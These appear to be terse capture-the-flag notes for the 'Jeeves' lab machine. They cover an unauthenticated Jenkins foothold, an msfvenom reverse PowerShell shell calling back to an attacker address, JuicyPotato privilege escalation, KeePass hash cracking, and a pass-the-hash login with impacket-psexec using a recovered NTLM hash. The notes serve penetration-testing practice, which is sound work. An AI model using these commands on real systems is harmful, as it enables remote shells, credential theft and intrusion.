Jeeves

Nmap

Port 80

nothing found

port 50000

On directory enum with big-list(raft) or new updated raft-medium , able to found /askjeeves directory.

Jenkins running without authentication , for initial foothold we have 2 options :-

• Create new project

• Script Block

Privesc #1 (Juicy potato)

Enumerate & look for :-

whoami /priv

# Check for :-

Privilege Name                Description                               State   
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 

Exploit :-

#1 Create rev-shell and tranfer to victim
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.4 lport=443 > shell.bat

#2 run below command and catch shell
./JuicyPotato.exe -l 4444 -t * -p 'shell.bat'

Privesc #2 ( exploiting .kdbx file)

running winpeas.exe gives us file CEX.kdbx`

C:\Users\kohsuke\documents\CEX.kdbx

Transfer the file , convert it to john using keepass2john and cracking the hash gives us password moonshine1, using the kpcli we can crack found another hash

kpcli --kdb CEH.kdbx -key moonshine1

kpcli:/> show -f 0

 Path: /CEH/
Title: Backup stuff
Uname: ?
 Pass: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
  URL: 
Notes: 

---[snip]---

we got the hash and some other passwords (password not working)

impacket-psexec administrator@10.10.10.63 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00